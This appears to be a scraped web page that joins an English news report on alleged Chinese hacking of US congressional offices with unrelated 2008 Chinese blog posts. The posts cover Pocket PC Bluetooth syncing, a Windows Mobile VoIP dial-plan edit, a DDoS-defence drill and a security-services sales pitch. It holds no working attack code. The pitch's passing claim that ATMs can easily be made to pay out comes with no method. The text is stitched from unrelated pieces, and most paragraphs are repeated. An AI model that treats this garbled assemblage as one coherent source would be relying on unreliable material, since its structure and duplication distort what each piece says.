Federal authorities have been increasingly concerned in recent years about the Chinese government's aggressive deployment of scientists, engineers, foreign businessmen, students, and others to sweep up American technology and information. Protecting the America against cyber-based attacks and high-tech crimes is the FBI's third investigative priority behind combating terrorism and public corruption.
The extent of the intrusions on Capitol Hill, which officials said began in August 2006, was unclear, although Rep. Frank Wolf, a Republican of Virginia, whose office had four computers affected, said that other members of Congress were targeted as well as at least one congressional committee. "They got everything," Mr. Wolf said at a press briefing describing the attack on his office systems.
Mr. Wolf said that following one of the attacks, a car with license plates belonging to Chinese officials went to the home of a Chinese dissident in the Washington suburbs and took photographs of it.
The Chinese government had no immediate comment on the allegations.
Mr. Wolf said an FBI probe confirmed the hacking incidents. The bureau declined comment.
The hacking report is the latest example of the vulnerabilities of private and public institutions to possible espionage and other crimes. Countries have been using cyber espionage for years to access valuable information in America, and China has made no secret of its interest in information warfare.
"Congress would be an attractive target for any spy or hacker, especially if there was information on political dissidents and on U.S. policies," a senior fellow and technology program director at the Center for Strategic and International Studies in Washington, James Lewis, said. Mr. Lewis said while China may be a logical suspect, good hackers are adept at hiding their tracks.
"We have a very sophisticated set of opponents. It could be the Chinese. It could be the Russians. It could be somebody else," he said. "This isn't an amateur's game anymore. Particularly when you are talking about an interesting target like a congressman's human rights files, the folks who are going after that are not going to be teenagers in Mendocino."
The hackers were not identified, but one of the lawmakers, Rep. Chris Smith of New Jersey, a senior Republican on the House Foreign Affairs Committee, said he believed that all signs pointed to the Chinese government.
Federal authorities have been increasingly concerned in recent years about the Chinese government's aggressive deployment of scientists, engineers, foreign businessmen, students, and others to sweep up American technology and information. Protecting the America against cyber-based attacks and high-tech crimes is the FBI's third investigative priority behind combating terrorism and public corruption.
The extent of the intrusions on Capitol Hill, which officials said began in August 2006, was unclear, although Rep. Frank Wolf, a Republican of Virginia, whose office had four computers affected, said that other members of Congress were targeted as well as at least one congressional committee. "They got everything," Mr. Wolf said at a press briefing describing the attack on his office systems.
Mr. Wolf said that following one of the attacks, a car with license plates belonging to Chinese officials went to the home of a Chinese dissident in the Washington suburbs and took photographs of it.
The Chinese government had no immediate comment on the allegations.
Mr. Wolf said an FBI probe confirmed the hacking incidents. The bureau declined comment.
The hacking report is the latest example of the vulnerabilities of private and public institutions to possible espionage and other crimes. Countries have been using cyber espionage for years to access valuable information in America, and China has made no secret of its interest in information warfare.
"Congress would be an attractive target for any spy or hacker, especially if there was information on political dissidents and on U.S. policies," a senior fellow and technology program director at the Center for Strategic and International Studies in Washington, James Lewis, said. Mr. Lewis said while China may be a logical suspect, good hackers are adept at hiding their tracks.
"We have a very sophisticated set of opponents. It could be the Chinese. It could be the Russians. It could be somebody else," he said. "This isn't an amateur's game anymore. Particularly when you are talking about an interesting target like a congressman's human rights files, the folks who are going after that are not going to be teenagers in Mendocino."
2008年6月12日星期四
关于蓝牙同步的再次补充
ppc与电脑的蓝牙同步或通过蓝牙上网,有时提示正在同步,要经过很长时间却最终失败了。有时在ppc上面找蓝牙设备的服务,却找不到相应的同步服务。总之,蓝牙失败了,重启一般就会正常。
重启的原因,其实是杀掉了activesync又重了服务,在service.msc服务管理中,没有找到相应的服务管理选项。这时可以用另一种办法。看到activesync在任务栏中了吗?许多程序都会放在这里面运行,管理这个的,是窗口管理器,explorer,只要ctrl +alt +del三键热启,调出任务管理器,将其中的exporer进程杀掉,就会退出当前窗口,此时就会蓝屏一片,但并不是真正的死机。还有个任务管理器呢?再在这里面的运行中,敲入explorer,窗口又回来了。而且,我们真正的目的,activesync也重启了一遍。
蓝牙同步以后,就可以控制计算机了,可以上网,看PPT,编辑。。。哈,稍微改造一下,是不是就是那个机顶盒呀,恩,比机顶盒可方便多了。推荐整天讲课培训的哥们儿用这个东东,比红外方便多了,电量用的也不多,可以支持很长时间。
不过话说回来,蓝牙和红外的电量哪个用的多呀?反正wifi用的电确实是够多的。蓝牙和红外呢?
在外面逛荡一圈,说话也感觉罗索了不少。中午吃了个金德利快餐,价格整体上涨了20%多,也算可以了,其它生活用品可上涨了30%呢。
重启的原因,其实是杀掉了activesync又重了服务,在service.msc服务管理中,没有找到相应的服务管理选项。这时可以用另一种办法。看到activesync在任务栏中了吗?许多程序都会放在这里面运行,管理这个的,是窗口管理器,explorer,只要ctrl +alt +del三键热启,调出任务管理器,将其中的exporer进程杀掉,就会退出当前窗口,此时就会蓝屏一片,但并不是真正的死机。还有个任务管理器呢?再在这里面的运行中,敲入explorer,窗口又回来了。而且,我们真正的目的,activesync也重启了一遍。
蓝牙同步以后,就可以控制计算机了,可以上网,看PPT,编辑。。。哈,稍微改造一下,是不是就是那个机顶盒呀,恩,比机顶盒可方便多了。推荐整天讲课培训的哥们儿用这个东东,比红外方便多了,电量用的也不多,可以支持很长时间。
不过话说回来,蓝牙和红外的电量哪个用的多呀?反正wifi用的电确实是够多的。蓝牙和红外呢?
在外面逛荡一圈,说话也感觉罗索了不少。中午吃了个金德利快餐,价格整体上涨了20%多,也算可以了,其它生活用品可上涨了30%呢。
2008年6月11日星期三
补充一下刚才的蓝牙上网
原来许多的蓝牙上网,都是笔记本通过手机的蓝牙上网,不过这种方式非常痛苦,现在最快的不过是EDGE、CDMA1X,几KB的速度,折腾人的耐心。
现在到处都能上网,宽带应用到角角落落,加上经常移动,掏出笔记本来上网什么的太傻了。所以,现在流行用手机上网,不过要想速度快,还得用蓝牙和WIFI,wifi缺电太耗电,蓝牙省多了,速度也不错。wifi的上网没有悬念,ppc上已经有配置工具了,让它自个儿找也可以。而且也有许多wifi信号扫描器。
蓝牙上网,就是刚才说的方法 ,几步配置就可以完成了。很方便很强大。蓝牙应用开来,还可以实现许多功能,如通讯录同步,通讯传输,传真,蓝牙耳机,文件传输,串口服务,手机服务,无绳电话无线免提 影像传递键盘、鼠标、家庭网络、高速无线内部网络、电子名片,哈哈,很是有趣的一种应用。在自个儿家里,要是用2.0版本的话,隔个墙仍然有信号,还是可以上网的。这样就不用整天坐在机器前了,都快石化了。PPC上面的应用也非常丰富,telnet/ssh/远程桌面什么的都有,有这些工具,基本就可以做许多事了。
现在到处都能上网,宽带应用到角角落落,加上经常移动,掏出笔记本来上网什么的太傻了。所以,现在流行用手机上网,不过要想速度快,还得用蓝牙和WIFI,wifi缺电太耗电,蓝牙省多了,速度也不错。wifi的上网没有悬念,ppc上已经有配置工具了,让它自个儿找也可以。而且也有许多wifi信号扫描器。
蓝牙上网,就是刚才说的方法 ,几步配置就可以完成了。很方便很强大。蓝牙应用开来,还可以实现许多功能,如通讯录同步,通讯传输,传真,蓝牙耳机,文件传输,串口服务,手机服务,无绳电话无线免提 影像传递键盘、鼠标、家庭网络、高速无线内部网络、电子名片,哈哈,很是有趣的一种应用。在自个儿家里,要是用2.0版本的话,隔个墙仍然有信号,还是可以上网的。这样就不用整天坐在机器前了,都快石化了。PPC上面的应用也非常丰富,telnet/ssh/远程桌面什么的都有,有这些工具,基本就可以做许多事了。
如何通过蓝牙同步
如何通过蓝牙同步:
步骤比较简单,但却折腾了我挺长时间。首先在控制面板中,选择蓝牙配置,新建一个端口,我用的com6,这样提示安装新件,没到这一步时没有提示。有些蓝牙适配器没有新硬件安装提示,直接新建端口就可以了。建完port,然后扫描蓝牙手机,按提示一步步下来将两者配对成功。最后把同步管理器打开,在文件,连接设置中,允许连接到下面一个端口,选择新建的com6。完成了这一步,再把蓝牙手机找出来,最后一步进行同步,在PPC的同步管理器中,选择"通过蓝牙连接",提示连接成功,完成了。这样就可以控制手机,在电脑上发短信,查通讯录什么什么的,总之可以做很多事情了。
另外也有个挺好的功能,可以通过蓝牙,打VOIP电话呀,就不用在电脑上带着耳机那么弱了、也可以通过蓝牙同步上网,更新RSS随身阅读的一些资料。。。。想像力提升一下,可以找到许多应用的。
步骤比较简单,但却折腾了我挺长时间。首先在控制面板中,选择蓝牙配置,新建一个端口,我用的com6,这样提示安装新件,没到这一步时没有提示。有些蓝牙适配器没有新硬件安装提示,直接新建端口就可以了。建完port,然后扫描蓝牙手机,按提示一步步下来将两者配对成功。最后把同步管理器打开,在文件,连接设置中,允许连接到下面一个端口,选择新建的com6。完成了这一步,再把蓝牙手机找出来,最后一步进行同步,在PPC的同步管理器中,选择"通过蓝牙连接",提示连接成功,完成了。这样就可以控制手机,在电脑上发短信,查通讯录什么什么的,总之可以做很多事情了。
另外也有个挺好的功能,可以通过蓝牙,打VOIP电话呀,就不用在电脑上带着耳机那么弱了、也可以通过蓝牙同步上网,更新RSS随身阅读的一些资料。。。。想像力提升一下,可以找到许多应用的。
ppc无法同步的问题
ppc同步时,经过很长时间连接后,最后竟然没有成功,是什么原因? ppc上面也显示正在进行同步,但过一会儿就超时了。修改ppc上面的internet连接共享,将连接方式由原来的蓝牙pna,改为USB,重启电脑后就可以了。也可以用这个工具解决:DinarSoft-MemMaid%202.0-cn.rar,是绿色版本的,直接放到卡里运行就可以了。这个工具效果更好,重新设置同步后,几乎可以解决所有的异常问题
使用wm6自带的voip功能
Windows Mobile 6
For example your T-Mobile Dash, T-Mobile Wing GSM Cellular, HTC S630, HTC TyTN II, HP iPAQ, etc.
The WM6 OS generic version has the ability to be configured to make VOIP calls. But many providers remove this option, not wanting to encourage VOIP use on their network.
Check if the VoIP is support is present in your ROM, as some cooks have removed them from the ROM.
so look for the Internet Calling today item as well as for the following files from the packages VoIP and VoIPOS in the \Windows directory:
ipdialplan.xml
dnsapi.dll
voipphonecanvas.dll
rtcdll.dll
If you don't have Internet Calling support in your ROM download the follow cab and install to your rom.
http://brujula.net/windows-mobile/wm6voip.cab
http://brujula.net/windows-mobile/sipconfigtool200.cab
You can however put it back by installing the WM6 VOIP cab file and then a SIP configuration tool to enable you to enter your own SIP provider.
http://fonosip.com/english/wm6_smartphone.html
There is a default dial plan setting in ipdialplan.xml,
It auto add a '9' when you dial 11 or 10 number. So if you using vbuzzer voip service, it can not call out.
You can change the dial plan by edit ipdialplan.xml,
for example:
<!-- 11-digits rules -->
<rule pattern='1\s*-?\s*(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:91\1\2\3@$host$'
display='1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='1\s*-?\s*\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:91\1\2\3@$host$'
display='1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='\+\s*1\s*-?\s*(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:91\1\2\3@$host$'
display='+1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='\+\s*1\s*-?\s*\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:91\1\2\3@$host$'
display='+1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
chang to (just remove the '9')
<!-- 11-digits rules -->
<rule pattern='1\s*-?\s*(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='1\s*-?\s*\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='\+\s*1\s*-?\s*(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='+1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='\+\s*1\s*-?\s*\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='+1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
**********************************************************************************
and also :
<!-- 10-digits rules -->
<rule pattern='(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:9\1\2\3@$host$'
display='(\1) \2-\3'
transfer='sip:\1\2\3@$host$'
/>
<rule pattern='\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:9\1\2\3@$host$'
display='(\1) \2-\3'
transfer='sip:\1\2\3@$host$'
/>
change to (when dial 10 number auto add 1 )
<!-- 10-digits rules -->
<rule pattern='(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='(\1) \2-\3'
transfer='sip:\1\2\3@$host$'
/>
<rule pattern='\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='(\1) \2-\3'
transfer='sip:\1\2\3@$host$'
/>
For example your T-Mobile Dash, T-Mobile Wing GSM Cellular, HTC S630, HTC TyTN II, HP iPAQ, etc.
The WM6 OS generic version has the ability to be configured to make VOIP calls. But many providers remove this option, not wanting to encourage VOIP use on their network.
Check if the VoIP is support is present in your ROM, as some cooks have removed them from the ROM.
so look for the Internet Calling today item as well as for the following files from the packages VoIP and VoIPOS in the \Windows directory:
ipdialplan.xml
dnsapi.dll
voipphonecanvas.dll
rtcdll.dll
If you don't have Internet Calling support in your ROM download the follow cab and install to your rom.
http://brujula.net/windows-mobile/wm6voip.cab
http://brujula.net/windows-mobile/sipconfigtool200.cab
You can however put it back by installing the WM6 VOIP cab file and then a SIP configuration tool to enable you to enter your own SIP provider.
http://fonosip.com/english/wm6_smartphone.html
There is a default dial plan setting in ipdialplan.xml,
It auto add a '9' when you dial 11 or 10 number. So if you using vbuzzer voip service, it can not call out.
You can change the dial plan by edit ipdialplan.xml,
for example:
<!-- 11-digits rules -->
<rule pattern='1\s*-?\s*(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:91\1\2\3@$host$'
display='1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='1\s*-?\s*\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:91\1\2\3@$host$'
display='1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='\+\s*1\s*-?\s*(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:91\1\2\3@$host$'
display='+1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='\+\s*1\s*-?\s*\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:91\1\2\3@$host$'
display='+1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
chang to (just remove the '9')
<!-- 11-digits rules -->
<rule pattern='1\s*-?\s*(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='1\s*-?\s*\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='\+\s*1\s*-?\s*(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='+1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
<rule pattern='\+\s*1\s*-?\s*\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='+1 (\1) \2-\3'
transfer='sip:1\1\2\3@$host$'
/>
**********************************************************************************
and also :
<!-- 10-digits rules -->
<rule pattern='(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:9\1\2\3@$host$'
display='(\1) \2-\3'
transfer='sip:\1\2\3@$host$'
/>
<rule pattern='\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:9\1\2\3@$host$'
display='(\1) \2-\3'
transfer='sip:\1\2\3@$host$'
/>
change to (when dial 10 number auto add 1 )
<!-- 10-digits rules -->
<rule pattern='(\d{3})\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='(\1) \2-\3'
transfer='sip:\1\2\3@$host$'
/>
<rule pattern='\((\d{3})\)\s*(\d{3})\s*-?\s*(\d{4})(\s*[Xx]\s*\d+)?'
dial='sip:1\1\2\3@$host$'
display='(\1) \2-\3'
transfer='sip:\1\2\3@$host$'
/>
2008年6月6日星期五
现实情况远比想像的严重
参加本省通信管理局的"奥运攻防演练",题目挺长,好像是这个。许多人拿着剧本,和演戏一样排练。也比较理解他们,政府工作就得会唱会说,说不出来埋头苦干,在哪儿都是白干,这也是中国企业的管理特征。会哭的孩子会奶吃。演练是要汇报的,要表现给领导看。
演练主要是四部分内容:反垃圾邮件,DDOS攻击,路由器攻击,还是一部分是什么来着,网站窜改?
我做的是DDOS攻击的防护。奶奶的,明天就要给领导汇报了,忽然发现他们用的设备抗不住攻击,只要一攻击就设备就瘫了,于是找到我。好长时间没揽到这样的业务了。于是又拿到我那台老旧的"tp600"笔记本,现写了防火墙 脚本,优化系统,又到科技市场买了pcmcia的小辫子网卡,为防不测一口气买了三,结果折腾了一顿才发现,笔记本的第二个口竟然有问题,用这个口接收包,丢包在50%以上。什么原因没时间去研究了,但这样肯定不行了。本来这台Pii 300的老旧机器,虽然总线只有33MB,但在演练环境下处理DDOS应该没问题的,这下没办法了,只好再去找台PC机处理了。要是有台理想的工控机就好了。
PC机需要自个儿备,总不能把老婆的工作机器搬过来吧,只好又找另一台配置稍高点儿的笔记本。连个光驱也没有,没法换BSD系统,更郁闷。虽然可以用硬盘安装,但原来没弄过,时间又紧,没时间去搞了。只好换系统,原来打算用BSD去抗ddos攻击,现在只好用最不喜欢的UBUNTU LINUX去做处理了。效果上应该也差不多,但内核也没时间编译,好多地方没把握应该怎么处理,而且时间这么短,经验又少,奶奶的这不是给我出难题吗?等这个题目做完有时间了,一定抽时间专门定制一个桥版本,打造的好一些,以后处理ddos机会还是挺多的,最起码效果得赶上绿盟的黑洞吧。呵呵,当然咱这么短时间内搞这么个东西,效果肯定比人家差远了。他们在BSD下面还改了不少东西,在国内做的算好的。不过这类设备,谁会拿20万平时放在那儿啊,sina/sohu/163放了吗?
所谓攻防演练,在我看来都是十年的一些事件处理。政府管理部门甚至一些做网络安全的公司,都没有意识到情况更严重的现实。十年前的攻击,可能会对网站,服务器,目标网络展开攻击什么的,不过据我观察,现在的攻击有种趋势,一是更加海量的自动化,可以迅速拿下有同样漏洞的目标;二是更加准确度更高,更加难以防御。下面详细说说这个。。
海量攻击自动化,可以迅速得到大量的肉鸡,或者在海量肉鸡寻找兴趣的机密信息,或者在肉鸡中挂马,放蠕虫病毒,或者进一步扩大战果。最近一段时间传统的蠕虫病毒少了,但过一段时间,不远的几个月内,新攻击特征的蠕虫就会爆发。如果国内的这帮哥们儿少了浮燥多了研究技术心态的话,这个过程会更短的。
准确度更高的攻击。现在的许多攻击都是有目标性的,就是针对一个或几个目标进行渗透。或者为了架桥挂马,或者为了权限,或者为了信息,有许多是用了没有公开的漏洞进行的,还有些手法,先进性地利用了p2p技术,现在几乎没有安全设备也可以防御,许多厂家连这方向的概念都没有。网络上发布了大量的机密信息,不知道美英这些国家是怎么做到的,他们泄露的还少许多,咱们这边几乎许多都透明了,许多地方根本都没有觉察到。呵呵,这就是国内的安全现状,大量的信息通过骇客们利用的P2P发送出去了。有人找我处理,都是光干活白忙活,奶奶的要不说我整天鸡窜狗跳的,却一分钱也没有。爷也需要赚钱吃饭啊。再这样下去,就不累自己了。反正现在的情况已经没法再糟糕了,总有一天官老爷们会觉醒的,扯的有些远了,就是发些牢骚,光会忙活的活的累,会忽悠的有钱花,种地最苦却仅够温饱,奶奶的幸好现在不用种地了
防范上面的攻击是最近一直考虑的。针对奥运期间的网络攻击防范,尤其是奥运信息发布网站平台的一些攻击,我想了一些办法,肯定比现在用的方法好多了,可以方便地监控到一个地区甚至一个省的攻击情况,每天还是让我这台老旧的tp600 Pii300的机器去处理吧,真是爱死这台黑黑的机器了,多少年了,做了多少贡献啊
吃饭,一会儿还要去省通信管理局,他们在省安全厅附近,又碰到这帮神经质的哥们儿了
演练主要是四部分内容:反垃圾邮件,DDOS攻击,路由器攻击,还是一部分是什么来着,网站窜改?
我做的是DDOS攻击的防护。奶奶的,明天就要给领导汇报了,忽然发现他们用的设备抗不住攻击,只要一攻击就设备就瘫了,于是找到我。好长时间没揽到这样的业务了。于是又拿到我那台老旧的"tp600"笔记本,现写了防火墙 脚本,优化系统,又到科技市场买了pcmcia的小辫子网卡,为防不测一口气买了三,结果折腾了一顿才发现,笔记本的第二个口竟然有问题,用这个口接收包,丢包在50%以上。什么原因没时间去研究了,但这样肯定不行了。本来这台Pii 300的老旧机器,虽然总线只有33MB,但在演练环境下处理DDOS应该没问题的,这下没办法了,只好再去找台PC机处理了。要是有台理想的工控机就好了。
PC机需要自个儿备,总不能把老婆的工作机器搬过来吧,只好又找另一台配置稍高点儿的笔记本。连个光驱也没有,没法换BSD系统,更郁闷。虽然可以用硬盘安装,但原来没弄过,时间又紧,没时间去搞了。只好换系统,原来打算用BSD去抗ddos攻击,现在只好用最不喜欢的UBUNTU LINUX去做处理了。效果上应该也差不多,但内核也没时间编译,好多地方没把握应该怎么处理,而且时间这么短,经验又少,奶奶的这不是给我出难题吗?等这个题目做完有时间了,一定抽时间专门定制一个桥版本,打造的好一些,以后处理ddos机会还是挺多的,最起码效果得赶上绿盟的黑洞吧。呵呵,当然咱这么短时间内搞这么个东西,效果肯定比人家差远了。他们在BSD下面还改了不少东西,在国内做的算好的。不过这类设备,谁会拿20万平时放在那儿啊,sina/sohu/163放了吗?
所谓攻防演练,在我看来都是十年的一些事件处理。政府管理部门甚至一些做网络安全的公司,都没有意识到情况更严重的现实。十年前的攻击,可能会对网站,服务器,目标网络展开攻击什么的,不过据我观察,现在的攻击有种趋势,一是更加海量的自动化,可以迅速拿下有同样漏洞的目标;二是更加准确度更高,更加难以防御。下面详细说说这个。。
海量攻击自动化,可以迅速得到大量的肉鸡,或者在海量肉鸡寻找兴趣的机密信息,或者在肉鸡中挂马,放蠕虫病毒,或者进一步扩大战果。最近一段时间传统的蠕虫病毒少了,但过一段时间,不远的几个月内,新攻击特征的蠕虫就会爆发。如果国内的这帮哥们儿少了浮燥多了研究技术心态的话,这个过程会更短的。
准确度更高的攻击。现在的许多攻击都是有目标性的,就是针对一个或几个目标进行渗透。或者为了架桥挂马,或者为了权限,或者为了信息,有许多是用了没有公开的漏洞进行的,还有些手法,先进性地利用了p2p技术,现在几乎没有安全设备也可以防御,许多厂家连这方向的概念都没有。网络上发布了大量的机密信息,不知道美英这些国家是怎么做到的,他们泄露的还少许多,咱们这边几乎许多都透明了,许多地方根本都没有觉察到。呵呵,这就是国内的安全现状,大量的信息通过骇客们利用的P2P发送出去了。有人找我处理,都是光干活白忙活,奶奶的要不说我整天鸡窜狗跳的,却一分钱也没有。爷也需要赚钱吃饭啊。再这样下去,就不累自己了。反正现在的情况已经没法再糟糕了,总有一天官老爷们会觉醒的,扯的有些远了,就是发些牢骚,光会忙活的活的累,会忽悠的有钱花,种地最苦却仅够温饱,奶奶的幸好现在不用种地了
防范上面的攻击是最近一直考虑的。针对奥运期间的网络攻击防范,尤其是奥运信息发布网站平台的一些攻击,我想了一些办法,肯定比现在用的方法好多了,可以方便地监控到一个地区甚至一个省的攻击情况,每天还是让我这台老旧的tp600 Pii300的机器去处理吧,真是爱死这台黑黑的机器了,多少年了,做了多少贡献啊
吃饭,一会儿还要去省通信管理局,他们在省安全厅附近,又碰到这帮神经质的哥们儿了
2008年5月30日星期五
信息流中的市场机会
前天谈了一下午没有尽兴。
现在各方面竟争都非常激烈,只有提供有特色的服务,照顾到客户的真实需求,把他们面临的现实问题方便快捷地解决掉,才能立于不败之境,才能稍微喘一口气,算是能存活下来。大家都在认真的为客户解决问题,一成不变的营销模式会碰到越来越大的压力,想要舒服着过日子,就得走和别人不一样的路子。
现在我能提供的,是系统网络安全服务,通俗上理解就是入侵和反入侵,保护服务器和系统稳定安全地运行,详细来说有:提供安全评估、系统防御、系统优化、系统网络异常故障解决、入侵损害恢复,数据恢复与保护、紧急响应等方面的服务。 服务体现在产品的实施和高质量运行上面。提供高性能自建网站服务器、邮件服务器、流量管理与分析统计、透明网关、网站加速网关、防病毒网关、防火墙、VPN、入侵检测、漏洞扫描、方案与咨询、技术支持、系统网络应用难题等服务
当然,我们还可以做的更多,以我们的能力,许多的业务系统,比OA、业务应用,财务,ERP什么的,我们都可以很快地实现,但这些东西,现在也没多少技术含量,在国内也炒成冷饭了,竟争非常激烈。但咱们所能做的这部分,没多少人能做,现在的竟争对手几近于0,将来也不会很多。因为做系统网络安全服务,要对所有的操作系统,所有的编程语言,业务应用系统,网络设备,安全漏洞,病毒,攻击手法,防护方法,网络事件,软硬件至管理方面,都要有较深的理解和掌握,不是一般公司有能力去做的。选择这条路,压力大,收益也会非常大。
我的想法,是咱们延伸现在的营销触角,以现有的渠道尽量满足客户的需求,找找看有哪些是我们可以做的。客户产生需求,到购买服务器到实现需求,往往会有许多弯路,浪费时间和资金,尤其是国内企事业单位掌握信息化技术的能力,往主到最后的实现,都距离期望目标有较大距离。我们可以在客户产生需求的最初阶段进,就提供咨询和后续服务,哈,发展这种影响力,可以成长为真正的老大,其它厂家都得给我们面子,哈,可比现在做价格做渠道强多了吧?
系统网络安全几乎涵盖了所有的信息资产,包括大部分软硬件业务解决方案,所以和金箍棒一样可东可西,可以变化出很多的业务模式来。那天我们谈的ATM机问题,用简单的方法就可以让ATM哗哗吐钱,让自动售货机哗哗出货,虽然可能跑去弄出一个项目来,但这个颇有些忽悠人的成分,他们存在更多更严重的问题等待解决。国内的军队、政府,水电煤气交通(信号铁路航空管制)国家电网金融证券。。。。这些非常重要的部门都有大量的问题,要是发生信息战争,我相信咱们国家会在很短时间内陷于一片混乱,咱们的安全水平比人家可差的不是一点儿两点儿,咱们现在就象是小学考了双百,就开始轻视起科学家一样。咱们刚学会骑车子,人家已经开上飞机了。他们在实验室里的东西更加先进,有些是不可想像的。我们的工作,既是为国家做贡献,也是挖掘信息的市场,把纷繁复杂的信息流,朝着人类思索的方向发展,以期符合灵魂中的真理善良,成为更高层次的工具和朋友。
期待与你更多的合作。
现在各方面竟争都非常激烈,只有提供有特色的服务,照顾到客户的真实需求,把他们面临的现实问题方便快捷地解决掉,才能立于不败之境,才能稍微喘一口气,算是能存活下来。大家都在认真的为客户解决问题,一成不变的营销模式会碰到越来越大的压力,想要舒服着过日子,就得走和别人不一样的路子。
现在我能提供的,是系统网络安全服务,通俗上理解就是入侵和反入侵,保护服务器和系统稳定安全地运行,详细来说有:提供安全评估、系统防御、系统优化、系统网络异常故障解决、入侵损害恢复,数据恢复与保护、紧急响应等方面的服务。 服务体现在产品的实施和高质量运行上面。提供高性能自建网站服务器、邮件服务器、流量管理与分析统计、透明网关、网站加速网关、防病毒网关、防火墙、VPN、入侵检测、漏洞扫描、方案与咨询、技术支持、系统网络应用难题等服务
当然,我们还可以做的更多,以我们的能力,许多的业务系统,比OA、业务应用,财务,ERP什么的,我们都可以很快地实现,但这些东西,现在也没多少技术含量,在国内也炒成冷饭了,竟争非常激烈。但咱们所能做的这部分,没多少人能做,现在的竟争对手几近于0,将来也不会很多。因为做系统网络安全服务,要对所有的操作系统,所有的编程语言,业务应用系统,网络设备,安全漏洞,病毒,攻击手法,防护方法,网络事件,软硬件至管理方面,都要有较深的理解和掌握,不是一般公司有能力去做的。选择这条路,压力大,收益也会非常大。
我的想法,是咱们延伸现在的营销触角,以现有的渠道尽量满足客户的需求,找找看有哪些是我们可以做的。客户产生需求,到购买服务器到实现需求,往往会有许多弯路,浪费时间和资金,尤其是国内企事业单位掌握信息化技术的能力,往主到最后的实现,都距离期望目标有较大距离。我们可以在客户产生需求的最初阶段进,就提供咨询和后续服务,哈,发展这种影响力,可以成长为真正的老大,其它厂家都得给我们面子,哈,可比现在做价格做渠道强多了吧?
系统网络安全几乎涵盖了所有的信息资产,包括大部分软硬件业务解决方案,所以和金箍棒一样可东可西,可以变化出很多的业务模式来。那天我们谈的ATM机问题,用简单的方法就可以让ATM哗哗吐钱,让自动售货机哗哗出货,虽然可能跑去弄出一个项目来,但这个颇有些忽悠人的成分,他们存在更多更严重的问题等待解决。国内的军队、政府,水电煤气交通(信号铁路航空管制)国家电网金融证券。。。。这些非常重要的部门都有大量的问题,要是发生信息战争,我相信咱们国家会在很短时间内陷于一片混乱,咱们的安全水平比人家可差的不是一点儿两点儿,咱们现在就象是小学考了双百,就开始轻视起科学家一样。咱们刚学会骑车子,人家已经开上飞机了。他们在实验室里的东西更加先进,有些是不可想像的。我们的工作,既是为国家做贡献,也是挖掘信息的市场,把纷繁复杂的信息流,朝着人类思索的方向发展,以期符合灵魂中的真理善良,成为更高层次的工具和朋友。
期待与你更多的合作。
2008年5月26日星期一
作研究从下面这9个网站就完全可以了
